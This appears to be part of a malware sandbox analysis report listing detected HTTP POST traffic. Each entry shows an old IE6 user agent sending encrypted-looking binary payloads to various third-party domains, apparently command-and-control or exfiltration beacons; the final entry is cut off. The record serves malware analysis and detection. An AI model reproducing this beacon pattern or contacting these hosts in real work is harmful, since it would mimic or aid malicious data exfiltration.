                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 580User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.edimart.huCache-Control: no-cacheData Raw: 4e 4f 47 52 73 5a 5a 58 4a 47 6e 73 53 67 65 55 63 53 6e 54 6d 7a 6e 68 6c 32 49 32 70 53 58 7a 4b 75 31 39 72 33 61 4d 4e 49 46 35 51 39 79 33 53 4e 6f 77 43 51 39 33 5a 59 43 53 52 69 69 64 77 2f 75 48 43 48 46 71 43 6d 79 33 65 67 37 73 4d 53 2f 53 39 32 42 61 56 44 66 6d 6e 50 2f 4a 47 30 35 6b 31 53 6b 4b 4c 64 56 66 53 36 65 2b 4a 6c 4d 6f 6a 72 77 72 59 46 35 76 68 4b 6b 42 59 55 6d 41 56 73 2b 46 4d 65 37 73 65 34 79 78 35 70 48 34 73 6b 38 53 44 62 64 2b 65 62 55 76 4c 65 41 6b 45 39 6f 61 5a 56 74 44 58 55 6c 76 37 74 41 4e 38 51 46 31 59 61 77 4b 6b 6b 70 54 2f 62 4f 74 63 37 6f 6f 33 4a 70 63 35 65 36 75 6a 65 6e 43 43 4b 61 7a 4f 37 75 49 61 75 61 75 6e 41 6a 71 61 56 78 31 42 43 39 41 2b 34 79 6c 5a 50 6c 64 65 30 44 53 4b 4c 52 6f 4c 4c 59 55 6d 47 4e 67 35 4e 72 64 2f 63 54 6a 74 49 76 50 2f 49 68 61 48 6d 4c 79 72 52 54 68 58 43 34 61 31 6c 42 37 53 2b 53 4d 6b 44 38 67 64 4a 51 30 4f 76 7a 70 30 64 6f 77 6f 35 6c 53 33 57 6d 48 4a 56 7a 4b 50 7a 36 2b 61 63 37 77 63 4e 58 48 50 58 61 5a 36 5a 75 31 4c 49 35 73 7a 56 6d 6d 6b 68 67 32 34 55 2f 56 34 48 52 44 43 6a 46 36 55 47 2f 71 39 49 6f 6e 64 43 66 73 53 41 38 58 2b 44 64 45 57 35 4b 47 7a 6e 72 76 53 51 52 65 73 75 46 4e 2f 55 49 77 55 33 30 36 35 75 57 67 30 6c 54 37 41 6f 63 33 45 61 50 4f 56 78 77 50 75 68 43 70 4e 6f 42 4e 51 50 4f 45 49 35 6a 42 79 65 54 42 2f 51 64 2f 42 73 38 70 72 49 54 46 78 77 75 45 56 75 76 4d 46 65 4e 79 50 4c 55 34 35 76 4e 59 2b 41 32 5a 54 6f 30 70 58 6c 52 4b 54 48 73 76 6d 45 65 43 59 54 2f 75 53 48 38 56 4c 33 52 4f 75 38 58 48 41 64 50 6f 64 34 72 57 71 53 64 50 53 38 6e 6b 74 34 61 41 65 56 67 37 50 65 2b 65 64 55 54 56 6d 50 43 54 6b 2f 55 62 4d 34 63 64 32 6e 2b 42 4b 35 47 4f 4a 47 74 67 56 51 3d 3d Data Ascii: NOGRsZZXJGnsSgeUcSnTmznhl2I2pSXzKu19r3aMNIF5Q9y3SNowCQ93ZYCSRiidw/uHCHFqCmy3eg7sMS/S92BaVDfmnP/JG05k1SkKLdVfS6e+JlMojrwrYF5vhKkBYUmAVs+FMe7se4yx5pH4sk8SDbd+ebUvLeAkE9oaZVtDXUlv7tAN8QF1YawKkkpT/bOtc7oo3Jpc5e6ujenCCKazO7uIauaunAjqaVx1BC9A+4ylZPlde0DSKLRoLLYUmGNg5Nrd/cTjtIvP/IhaHmLyrRThXC4a1lB7S+SMkD8gdJQ0Ovzp0dowo5lS3WmHJVzKPz6+ac7wcNXHPXaZ6Zu1LI5szVmmkhg24U/V4HRDCjF6UG/q9IondCfsSA8X+DdEW5KGznrvSQResuFN/UIwU3065uWg0lT7Aoc3EaPOVxwPuhCpNoBNQPOEI5jByeTB/Qd/Bs8prITFxwuEVuvMFeNyPLU45vNY+A2ZTo0pXlRKTHsvmEeCYT/uSH8VL3ROu8XHAdPod4rWqSdPS8nkt4aAeVg7Pe+edUTVmPCTk/UbM4cd2n+BK5GOJGtgVQ==
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 548User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.naoi-a.comCache-Control: no-cacheData Raw: 79 2b 33 4b 6e 73 54 4b 43 6d 6c 49 42 74 69 42 33 31 66 70 71 35 64 32 4c 6e 66 38 79 75 51 75 4f 4b 79 78 6f 66 64 2b 67 44 52 50 75 5a 69 37 75 74 62 41 49 6f 71 69 50 45 4c 58 53 53 68 4b 4c 4e 37 56 58 5a 72 45 6f 32 33 30 49 62 71 75 44 75 54 7a 70 35 51 6a 47 59 54 64 31 48 6f 36 59 61 79 78 66 47 71 47 4f 69 77 7a 6e 46 74 4a 67 65 56 6f 42 2f 6a 33 71 47 2f 5a 76 32 61 47 47 47 6e 52 34 6a 4c 32 73 75 6e 34 56 41 58 54 46 43 35 51 6c 76 70 50 5a 2b 6a 54 77 42 69 73 4d 58 75 4c 4c 41 61 54 41 6e 70 39 4d 43 44 6d 50 45 6a 2f 2b 64 71 56 5a 57 66 44 4d 50 6b 4c 6d 7a 66 59 77 49 34 69 6c 52 41 47 49 69 77 4c 73 61 4d 34 35 63 77 7a 48 72 5a 63 4e 53 41 75 2f 54 33 75 4c 6f 63 58 49 75 50 44 49 5a 4a 45 73 45 38 50 6d 31 4c 73 71 4a 66 4c 6f 33 33 41 73 36 31 36 42 4b 48 43 65 32 62 65 6c 50 53 49 6e 66 31 71 65 4c 37 69 45 76 52 39 6e 39 6f 62 44 70 54 66 6e 6b 39 4f 73 6c 78 6d 30 55 52 53 6b 53 55 42 57 38 34 70 6d 36 31 42 50 57 79 44 77 33 4c 2b 43 6c 4f 2b 53 32 70 73 6b 44 70 79 2f 6b 74 47 57 43 49 78 67 65 5a 71 69 65 69 4f 78 63 49 77 49 75 37 39 4d 57 41 59 4b 4a 32 4f 47 6e 36 32 50 30 51 7a 65 45 36 70 66 77 42 72 4d 7a 35 35 69 4d 34 51 66 35 75 76 62 50 31 69 33 50 66 34 44 2f 4e 4a 7a 6e 59 74 39 6e 71 4c 57 47 6b 64 52 55 32 39 65 37 76 72 51 65 46 4b 58 37 47 5a 68 70 6e 7a 36 48 51 33 50 47 42 45 67 46 4d 45 52 4c 78 5a 39 43 44 4f 66 46 77 33 2f 66 55 6b 45 33 6e 78 4d 73 4f 64 6c 78 42 52 6d 55 4c 57 69 4a 64 4c 76 52 6f 4e 73 56 4d 51 78 71 78 62 4a 41 72 76 6f 49 51 53 56 34 71 36 47 47 74 41 65 53 61 4d 4e 49 6f 41 63 45 4e 66 63 59 4a 65 69 50 33 36 47 39 64 45 6a 4b 56 6b 56 2f 2f 68 Data Ascii: y+3KnsTKCmlIBtiB31fpq5d2Lnf8yuQuOKyxofd+gDRPuZi7utbAIoqiPELXSShKLN7VXZrEo230IbquDuTzp5QjGYTd1Ho6YayxfGqGOiwznFtJgeVoB/j3qG/Zv2aGGGnR4jL2sun4VAXTFC5QlvpPZ+jTwBisMXuLLAaTAnp9MCDmPEj/+dqVZWfDMPkLmzfYwI4ilRAGIiwLsaM45cwzHrZcNSAu/T3uLocXIuPDIZJEsE8Pm1LsqJfLo33As616BKHCe2belPSInf1qeL7iEvR9n9obDpTfnk9Oslxm0URSkSUBW84pm61BPWyDw3L+ClO+S2pskDpy/ktGWCIxgeZqieiOxcIwIu79MWAYKJ2OGn62P0QzeE6pfwBrMz55iM4Qf5uvbP1i3Pf4D/NJznYt9nqLWGkdRU29e7vrQeFKX7GZhpnz6HQ3PGBEgFMERLxZ9CDOfFw3/fUkE3nxMsOdlxBRmULWiJdLvRoNsVMQxqxbJArvoIQSV4q6GGtAeSaMNIoAcENfcYJeiP36G9dEjKVkV//h
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 552User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.cokocoko.comCache-Control: no-cacheData Raw: 4f 76 44 38 49 65 69 74 48 32 6b 68 41 48 7a 72 71 7a 6a 39 4c 56 74 56 65 66 4c 77 56 6a 42 74 6e 49 39 2f 4a 71 77 34 75 52 75 6e 34 63 76 6b 6f 52 35 6e 45 76 52 4f 31 45 6b 59 45 73 79 68 30 68 6f 33 45 49 6d 70 73 35 72 49 30 6e 39 58 2b 51 6e 79 2b 74 56 43 46 44 66 76 6e 78 5a 30 77 63 51 38 62 6b 4b 44 4e 43 71 61 36 44 36 4b 4a 70 50 4a 73 7a 41 33 73 6b 2b 76 50 6b 48 65 41 70 5a 64 64 6d 57 62 68 58 66 4a 39 41 32 6f 4a 43 44 59 2f 2b 6a 63 6c 75 4c 47 6d 72 6b 69 34 4b 58 36 7a 33 59 37 6e 49 39 44 79 79 73 79 4b 64 76 69 52 42 4a 54 31 4d 56 35 63 73 4c 51 76 76 67 71 59 6b 56 2b 67 37 2b 48 6c 66 63 38 59 4b 58 33 74 67 6c 31 53 6d 31 57 5a 36 4c 45 52 76 38 74 53 42 72 68 74 30 39 55 5a 67 38 51 77 4a 74 48 47 74 39 71 49 2b 63 58 59 34 50 58 6a 2b 43 74 57 46 73 58 41 64 37 66 78 73 63 48 53 2f 2b 52 4e 75 43 58 52 54 52 77 65 4e 55 42 73 75 32 7a 45 53 5a 67 68 47 34 42 42 53 33 2b 45 67 54 6c 37 63 70 61 76 51 78 6b 6d 35 35 6c 74 39 47 70 59 44 49 32 62 31 54 53 48 42 57 38 4a 4a 39 34 76 5a 6a 62 48 57 79 48 59 78 74 5a 4d 68 6a 63 55 34 72 53 56 2b 5a 42 38 65 49 51 62 64 66 5a 4b 70 78 54 5a 4c 39 4e 4b 45 71 67 6c 49 46 62 6f 50 49 55 41 66 39 37 43 6d 46 42 39 4f 54 6d 43 2b 6e 35 4b 42 37 37 6f 64 51 4d 6d 56 2f 62 6f 7a 59 73 50 54 64 54 30 4c 39 67 74 54 58 54 78 56 69 71 67 6f 47 66 6b 49 30 51 71 72 61 56 76 4a 4f 63 51 4a 35 6a 66 4a 2f 6c 64 6c 74 66 75 74 51 4c 61 54 71 74 5a 31 47 4d 31 65 31 4c 6a 53 6a 51 39 69 4b 75 39 72 39 48 45 37 65 37 52 4d 4d 47 77 48 55 7a 6b 59 45 79 73 73 48 7a 2b 64 78 6b 4c 37 51 6d 34 38 53 4a 49 31 36 72 4e 69 6d 6f 31 52 79 42 69 55 64 4f 56 78 57 46 63 67 4a 54 Data Ascii: OvD8IeitH2khAHzrqzj9LVtVefLwVjBtnI9/Jqw4uRun4cvkoR5nEvRO1EkYEsyh0ho3EImps5rI0n9X+Qny+tVCFDfvnxZ0wcQ8bkKDNCqa6D6KJpPJszA3sk+vPkHeApZddmWbhXfJ9A2oJCDY/+jcluLGmrki4KX6z3Y7nI9DyysyKdviRBJT1MV5csLQvvgqYkV+g7+Hlfc8YKX3tgl1Sm1WZ6LERv8tSBrht09UZg8QwJtHGt9qI+cXY4PXj+CtWFsXAd7fxscHS/+RNuCXRTRweNUBsu2zESZghG4BBS3+EgTl7cpavQxkm55lt9GpYDI2b1TSHBW8JJ94vZjbHWyHYxtZMhjcU4rSV+ZB8eIQbdfZKpxTZL9NKEqglIFboPIUAf97CmFB9OTmC+n5KB77odQMmV/bozYsPTdT0L9gtTXTxViqgoGfkI0QqraVvJOcQJ5jfJ/ldltfutQLaTqtZ1GM1e1LjSjQ9iKu9r9HE7e7RMMGwHUzkYEyssHz+dxkL7Qm48SJI16rNimo1RyBiUdOVxWFcgJT
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 556User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.pcgrate.comCache-Control: no-cacheData Raw: 66 65 47 70 39 38 67 2b 4e 32 6b 30 41 6d 36 38 43 39 50 49 75 44 74 35 47 45 74 51 4f 58 44 57 66 50 35 79 30 53 44 31 61 6b 43 4b 6f 39 49 43 6d 49 6d 69 73 62 30 33 2f 56 6d 61 49 31 56 74 50 69 48 70 4e 4f 41 38 78 76 4b 64 73 4e 74 38 74 55 7a 73 34 72 38 54 73 34 61 4b 2b 6b 39 38 7a 4d 78 4e 52 76 52 6e 51 52 6f 54 6b 57 4e 6e 36 53 67 65 49 54 4c 41 6a 72 37 72 73 6b 77 77 45 6a 37 38 77 76 33 36 4e 34 72 35 76 6d 72 43 31 30 32 46 6e 70 31 76 33 32 31 67 4a 64 4f 32 4b 38 54 68 4d 4d 55 79 4d 4e 49 33 2f 38 74 39 79 30 36 67 6c 69 4a 75 36 4c 4a 2b 71 49 67 50 66 2b 58 45 61 54 4d 43 74 68 6a 34 6d 76 57 53 35 48 4b 6e 63 42 43 7a 46 68 4f 57 49 41 6c 66 64 63 58 71 4a 35 6b 30 58 53 6f 43 73 70 30 63 6a 54 4d 52 70 6a 47 33 63 74 6a 33 65 49 4a 59 45 71 77 63 65 64 52 65 37 55 36 68 53 50 67 33 46 61 7a 69 6e 4d 45 68 67 48 71 4c 31 6d 46 58 54 50 50 6d 6f 46 77 35 66 75 43 63 4b 44 39 6a 58 53 34 36 30 62 77 66 51 7a 32 6a 65 32 4d 52 6c 49 4d 6b 43 6a 2f 77 6a 50 4c 79 6a 4f 59 46 4d 69 48 67 58 50 4f 68 4f 44 4c 50 78 62 70 62 39 6c 2f 41 41 45 57 68 50 61 4f 48 70 4a 41 59 74 47 2b 73 72 72 35 78 2f 76 6e 38 49 51 54 6f 4a 72 39 74 37 69 54 66 43 46 38 65 6b 77 34 32 70 33 71 75 53 74 2f 42 31 54 79 47 56 36 2b 65 36 2f 73 30 6b 77 7a 71 37 65 5a 48 6f 31 70 73 34 35 56 6c 42 69 36 33 74 4b 37 56 39 46 50 2b 4a 48 55 57 44 37 45 4e 70 33 59 2b 49 6a 5a 49 58 4b 78 71 68 52 43 63 38 52 71 4d 45 4b 48 4d 4b 49 39 55 53 4f 4c 6a 38 45 4c 6c 57 52 4b 43 79 74 4b 6a 7a 38 47 79 53 6f 6d 52 6b 64 57 43 76 57 47 52 7a 56 75 6f 56 36 53 62 6b 56 47 35 7a 6e 64 6f 51 74 67 51 58 56 58 56 42 31 70 74 34 30 61 42 74 73 2f 33 45 77 2b 34 Data Ascii: feGp98g+N2k0Am68C9PIuDt5GEtQOXDWfP5y0SD1akCKo9ICmImisb03/VmaI1VtPiHpNOA8xvKdsNt8tUzs4r8Ts4aK+k98zMxNRvRnQRoTkWNn6SgeITLAjr7rskwwEj78wv36N4r5vmrC102Fnp1v321gJdO2K8ThMMUyMNI3/8t9y06gliJu6LJ+qIgPf+XEaTMCthj4mvWS5HKncBCzFhOWIAlfdcXqJ5k0XSoCsp0cjTMRpjG3ctj3eIJYEqwcedRe7U6hSPg3FazinMEhgHqL1mFXTPPmoFw5fuCcKD9jXS460bwfQz2je2MRlIMkCj/wjPLyjOYFMiHgXPOhODLPxbpb9l/AAEWhPaOHpJAYtG+srr5x/vn8IQToJr9t7iTfCF8ekw42p3quSt/B1TyGV6+e6/s0kwzq7eZHo1ps45VlBi63tK7V9FP+JHUWD7ENp3Y+IjZIXKxqhRCc8RqMEKHMKI9USOLj8ELlWRKCytKjz8GySomRkdWCvWGRzVuoV6SbkVG5zndoQtgQXVXVB1pt40aBts/3Ew+4
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 580User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.jacomfg.comCache-Control: no-cacheData Raw: 52 75 66 4c 76 6b 4f 32 50 57 6d 49 54 4b 32 79 53 75 61 36 39 32 79 4e 4e 64 4c 70 77 66 46 42 4a 36 41 50 64 36 56 75 4d 68 79 73 69 4b 6f 41 44 69 54 53 68 73 63 65 71 78 45 76 37 65 35 52 7a 31 6c 39 4a 6a 43 46 4d 7a 73 6e 55 70 42 71 61 46 47 67 78 30 44 6a 53 37 4e 2b 38 6b 70 34 61 69 65 31 53 70 6d 4d 63 50 54 42 56 31 2f 65 53 6c 4c 2f 30 66 65 49 65 56 6f 47 5a 32 38 47 52 63 49 4d 33 43 53 66 35 4c 35 54 31 67 37 33 4b 78 64 36 42 62 41 6c 6c 4d 36 61 6f 6e 48 6d 67 35 4d 36 73 47 65 68 51 70 47 49 62 56 4a 37 68 76 63 54 75 45 6c 2f 74 54 6e 4c 65 64 4e 5a 4a 36 2f 4a 63 53 5a 7a 54 38 54 44 73 31 66 41 54 33 56 65 55 71 45 76 39 4c 62 75 49 71 2b 30 38 42 59 49 4e 75 42 58 46 76 6a 33 36 4d 6c 67 51 39 53 52 75 42 32 34 36 6d 66 50 66 63 43 46 46 59 46 34 32 5a 2f 2f 4c 53 67 73 58 73 4e 78 64 38 78 4a 33 4b 2b 68 51 78 55 45 67 79 51 48 58 54 75 55 64 79 4c 54 50 62 65 73 72 72 39 79 56 72 77 31 79 6d 42 61 4d 38 7a 43 57 38 53 47 43 37 46 4b 70 73 4a 41 64 74 2f 69 39 69 44 32 49 69 51 6e 4b 58 32 5a 6d 71 66 43 31 36 6b 34 44 4d 56 54 66 50 70 66 4e 5a 65 52 32 68 78 64 72 44 45 41 52 4f 44 4e 72 78 55 74 34 76 34 4c 2b 79 54 59 31 37 77 68 56 39 45 4a 38 71 45 58 51 6f 42 45 50 2b 6a 44 78 59 6b 53 65 35 41 35 2b 41 2b 51 48 76 2b 62 6f 79 76 57 63 6d 48 6e 53 49 38 51 63 77 49 39 35 74 6c 61 41 72 78 6f 68 71 50 46 72 72 71 6f 67 43 45 4f 62 48 62 71 6d 41 4b 65 51 55 6f 6c 47 2b 78 6f 46 69 62 35 70 43 39 71 64 53 46 67 32 52 57 66 44 35 72 42 7a 66 56 37 61 4a 32 43 48 31 6e 4c 6f 67 71 41 64 4e 47 56 35 48 6e 35 4f 4b 77 43 42 70 4e 44 70 59 6a 6f 77 7a 59 4a 73 36 54 56 68 49 55 55 74 50 36 79 65 38 4e 32 6e 6a 64 34 31 34 4a 39 5a 70 64 43 59 74 57 73 42 43 34 5a 6a 6b 53 79 64 53 63 3d Data Ascii: RufLvkO2PWmITK2ySua692yNNdLpwfFBJ6APd6VuMhysiKoADiTShsceqxEv7e5Rz1l9JjCFMzsnUpBqaFGgx0DjS7N+8kp4aie1SpmMcPTBV1/eSlL/0feIeVoGZ28GRcIM3CSf5L5T1g73Kxd6BbAllM6aonHmg5M6sGehQpGIbVJ7hvcTuEl/tTnLedNZJ6/JcSZzT8TDs1fAT3VeUqEv9LbuIq+08BYINuBXFvj36MlgQ9SRuB246mfPfcCFFYF42Z//LSgsXsNxd8xJ3K+hQxUEgyQHXTuUdyLTPbesrr9yVrw1ymBaM8zCW8SGC7FKpsJAdt/i9iD2IiQnKX2ZmqfC16k4DMVTfPpfNZeR2hxdrDEARODNrxUt4v4L+yTY17whV9EJ8qEXQoBEP+jDxYkSe5A5+A+QHv+boyvWcmHnSI8QcwI95tlaArxohqPFrrqogCEObHbqmAKeQUolG+xoFib5pC9qdSFg2RWfD5rBzfV7aJ2CH1nLogqAdNGV5Hn5OKwCBpNDpYjowzYJs6TVhIUUtP6ye8N2njd414J9ZpdCYtWsBC4ZjkSydSc=
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 544User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.xaicom.esCache-Control: no-cacheData Raw: 35 42 64 70 53 57 65 6c 47 47 6e 33 33 52 49 57 46 6d 4f 6c 69 7a 42 63 6a 76 50 64 4b 66 71 47 69 31 66 64 4f 30 6c 70 48 4f 69 38 70 7a 59 50 79 4b 72 30 43 44 4b 59 67 38 2b 39 71 39 6a 45 39 72 56 4e 66 4b 79 74 77 72 67 70 67 42 55 6c 72 63 4b 77 44 42 70 58 69 69 6d 31 64 2f 67 57 52 46 58 49 56 58 51 35 56 53 32 53 61 66 39 7a 70 6e 61 6b 42 59 67 64 72 58 76 6e 55 64 32 38 44 31 7a 35 61 7a 4d 43 77 67 31 35 69 71 73 4f 78 2f 7a 4f 4d 79 58 56 5a 35 33 6f 58 30 42 55 50 36 63 68 57 56 4b 4e 39 5a 4f 68 6e 79 6a 42 44 31 41 4b 6a 35 53 4d 72 67 68 47 7a 70 53 34 72 50 71 58 53 47 77 44 6d 62 59 4c 37 7a 77 70 6f 34 54 78 61 44 44 4c 4b 6c 6f 7a 4a 76 35 65 6f 78 62 4d 67 64 31 68 44 77 43 4c 62 6b 4e 6c 50 58 35 53 6f 2b 49 6c 79 42 6e 72 2b 32 6f 34 33 72 49 58 76 2f 41 54 4f 46 47 39 71 36 39 4f 31 43 70 38 37 4c 51 44 77 5a 42 58 41 78 50 76 31 54 61 66 32 2b 56 78 54 33 77 51 6f 2b 41 68 61 6c 6c 56 50 34 65 67 55 46 79 43 6b 43 6f 7a 41 34 44 4f 66 53 48 48 6c 6b 31 4d 51 74 59 68 6d 69 4b 58 6a 4f 6c 70 47 2f 44 41 5a 42 32 7a 56 6a 4b 4c 6a 32 56 65 43 45 63 52 6d 42 63 39 6d 79 75 33 5a 63 4e 59 50 74 55 68 6e 67 6f 78 55 4f 41 79 68 51 6c 37 4a 70 66 4f 77 4d 4b 49 6a 6a 78 48 61 5a 63 4b 6f 6c 57 53 6a 4f 70 4c 47 62 6b 74 67 58 47 63 64 47 38 77 61 4a 49 65 31 66 6c 32 46 4a 49 65 43 2f 61 72 70 51 64 52 73 67 41 79 75 52 57 6f 6f 41 6d 75 41 4f 38 35 62 58 71 78 48 36 77 6b 61 4f 44 6f 57 30 5a 78 74 30 73 70 68 31 71 71 70 57 6d 76 7a 39 79 2f 63 6c 74 2b 6a 30 73 75 70 31 6a 43 38 39 41 6f 75 57 35 57 68 69 2f 4d 61 71 43 44 69 66 4f 4d 76 4c 53 52 2f 59 6e 64 47 39 36 35 35 77 3d 3d Data Ascii: 5BdpSWelGGn33RIWFmOlizBcjvPdKfqGi1fdO0lpHOi8pzYPyKr0CDKYg8+9q9jE9rVNfKytwrgpgBUlrcKwDBpXiim1d/gWRFXIVXQ5VS2Saf9zpnakBYgdrXvnUd28D1z5azMCwg15iqsOx/zOMyXVZ53oX0BUP6chWVKN9ZOhnyjBD1AKj5SMrghGzpS4rPqXSGwDmbYL7zwpo4TxaDDLKlozJv5eoxbMgd1hDwCLbkNlPX5So+IlyBnr+2o43rIXv/ATOFG9q69O1Cp87LQDwZBXAxPv1Taf2+VxT3wQo+AhallVP4egUFyCkCozA4DOfSHHlk1MQtYhmiKXjOlpG/DAZB2zVjKLj2VeCEcRmBc9myu3ZcNYPtUhngoxUOAyhQl7JpfOwMKIjjxHaZcKolWSjOpLGbktgXGcdG8waJIe1fl2FJIeC/arpQdRsgAyuRWooAmuAO85bXqxH6wkaODoW0Zxt0sph1qqpWmvz9y/clt+j0sup1jC89AouW5Whi/MaqCDifOMvLSR/YndG9655w==
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 544User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.xaicom.esCache-Control: no-cacheData Raw: 35 42 64 70 53 57 65 6c 47 47 6e 33 33 52 49 57 46 6d 4f 6c 69 7a 42 63 6a 76 50 64 4b 66 71 47 69 31 66 64 4f 30 6c 70 48 4f 69 38 70 7a 59 50 79 4b 72 30 43 44 4b 59 67 38 2b 39 71 39 6a 45 39 72 56 4e 66 4b 79 74 77 72 67 70 67 42 55 6c 72 63 4b 77 44 42 70 58 69 69 6d 31 64 2f 67 57 52 46 58 49 56 58 51 35 56 53 32 53 61 66 39 7a 70 6e 61 6b 42 59 67 64 72 58 76 6e 55 64 32 38 44 31 7a 35 61 7a 4d 43 77 67 31 35 69 71 73 4f 78 2f 7a 4f 4d 79 58 56 5a 35 33 6f 58 30 42 55 50 36 63 68 57 56 4b 4e 39 5a 4f 68 6e 79 6a 42 44 31 41 4b 6a 35 53 4d 72 67 68 47 7a 70 53 34 72 50 71 58 53 47 77 44 6d 62 59 4c 37 7a 77 70 6f 34 54 78 61 44 44 4c 4b 6c 6f 7a 4a 76 35 65 6f 78 62 4d 67 64 31 68 44 77 43 4c 62 6b 4e 6c 50 58 35 53 6f 2b 49 6c 79 42 6e 72 2b 32 6f 34 33 72 49 58 76 2f 41 54 4f 46 47 39 71 36 39 4f 31 43 70 38 37 4c 51 44 77 5a 42 58 41 78 50 76 31 54 61 66 32 2b 56 78 54 33 77 51 6f 2b 41 68 61 6c 6c 56 50 34 65 67 55 46 79 43 6b 43 6f 7a 41 34 44 4f 66 53 48 48 6c 6b 31 4d 51 74 59 68 6d 69 4b 58 6a 4f 6c 70 47 2f 44 41 5a 42 32 7a 56 6a 4b 4c 6a 32 56 65 43 45 63 52 6d 42 63 39 6d 79 75 33 5a 63 4e 59 50 74 55 68 6e 67 6f 78 55 4f 41 79 68 51 6c 37 4a 70 66 4f 77 4d 4b 49 6a 6a 78 48 61 5a 63 4b 6f 6c 57 53 6a 4f 70 4c 47 62 6b 74 67 58 47 63 64 47 38 77 61 4a 49 65 31 66 6c 32 46 4a 49 65 43 2f 61 72 70 51 64 52 73 67 41 79 75 52 57 6f 6f 41 6d 75 41 4f 38 35 62 58 71 78 48 36 77 6b 61 4f 44 6f 57 30 5a 78 74 30 73 70 68 31 71 71 70 57 6d 76 7a 39 79 2f 63 6c 74 2b 6a 30 73 75 70 31 6a 43 38 39 41 6f 75 57 35 57 68 69 2f 4d 61 71 43 44 69 66 4f 4d 76 4c 53 52 2f 59 6e 64 47 39 36 35 35 77 3d 3d Data Ascii: 5BdpSWelGGn33RIWFmOlizBcjvPdKfqGi1fdO0lpHOi8pzYPyKr0CDKYg8+9q9jE9rVNfKytwrgpgBUlrcKwDBpXiim1d/gWRFXIVXQ5VS2Saf9zpnakBYgdrXvnUd28D1z5azMCwg15iqsOx/zOMyXVZ53oX0BUP6chWVKN9ZOhnyjBD1AKj5SMrghGzpS4rPqXSGwDmbYL7zwpo4TxaDDLKlozJv5eoxbMgd1hDwCLbkNlPX5So+IlyBnr+2o43rIXv/ATOFG9q69O1Cp87LQDwZBXAxPv1Taf2+VxT3wQo+AhallVP4egUFyCkCozA4DOfSHHlk1MQtYhmiKXjOlpG/DAZB2zVjKLj2VeCEcRmBc9myu3ZcNYPtUhngoxUOAyhQl7JpfOwMKIjjxHaZcKolWSjOpLGbktgXGcdG8waJIe1fl2FJIeC/arpQdRsgAyuRWooAmuAO85bXqxH6wkaODoW0Zxt0sph1qqpWmvz9y/clt+j0sup1jC89AouW5Whi/MaqCDifOMvLSR/YndG9655w==
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 560User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.speelhal.netCache-Control: no-cacheData Raw: 76 73 69 59 69 4f 5a 44 52 47 6b 56 67 2f 4d 6f 67 51 70 71 61 51 6d 6d 46 39 4c 47 48 38 56 58 65 76 61 65 45 64 4f 76 58 35 33 41 52 79 46 4d 6f 57 61 59 50 73 4d 43 6c 70 70 58 42 6f 4a 43 6c 70 47 68 7a 74 68 4a 48 45 72 70 49 6a 37 2b 31 51 6c 39 2f 57 53 47 48 74 4b 32 49 6b 77 57 54 44 30 74 6d 70 66 51 74 6f 56 37 64 56 4e 6b 74 51 32 49 64 42 4b 58 35 48 46 4d 69 74 50 72 70 45 6c 50 38 37 49 4f 41 4d 70 4f 2b 75 6f 50 66 55 75 73 65 46 43 71 7a 52 7a 36 2b 6a 7a 63 51 42 45 79 4f 6b 70 59 36 61 71 32 55 68 69 6f 6c 6d 56 63 66 77 53 34 79 65 54 6a 5a 48 52 7a 45 41 7a 39 64 4b 30 52 36 58 36 54 6c 35 4b 68 38 65 6e 6d 52 6d 35 59 62 73 72 47 6a 47 34 69 44 30 4d 6e 32 77 6c 2b 65 50 56 44 64 4f 36 50 55 58 35 38 4d 6a 46 47 74 38 62 6a 72 66 50 34 71 78 53 76 34 64 75 56 39 33 5a 36 34 54 4a 53 4d 47 6d 73 30 57 2b 65 42 30 6c 73 71 7a 5a 59 64 76 41 4a 35 4d 71 31 4c 58 75 7a 5a 68 35 6c 67 54 37 71 33 4b 2f 6a 4a 57 4d 68 72 71 6b 59 4b 30 69 57 54 72 36 37 53 61 57 4f 4f 37 4b 69 67 53 62 64 55 49 48 42 2b 4f 51 37 65 58 58 6c 6f 78 57 5a 66 75 2f 6d 52 68 54 64 58 37 71 4d 57 70 7a 4a 75 54 55 6d 38 78 4d 33 58 43 37 64 51 44 77 6d 49 31 68 4a 58 46 31 50 56 48 6a 61 46 30 56 55 65 43 43 4c 4a 44 70 6d 6f 36 46 61 6e 53 61 36 68 36 71 2b 76 63 4d 6f 48 43 45 51 52 7a 62 6c 41 6d 37 4a 65 7a 57 36 41 71 45 52 37 57 37 66 73 41 30 51 4b 2f 51 6d 65 2b 74 53 5a 41 4c 2b 41 30 44 46 70 49 33 6f 4f 73 50 74 76 4d 66 61 66 72 63 4b 77 5a 42 76 75 6e 4d 6d 70 78 55 44 46 69 54 64 4c 72 65 6e 53 67 30 64 49 75 42 46 4f 65 58 7a 64 38 6d 58 71 75 55 44 58 5a 38 4f 4e 74 79 64 54 6b 42 6e 32 76 31 63 34 44 34 44 41 2b 69 62 79 37 58 46 77 68 69 52 Data Ascii: 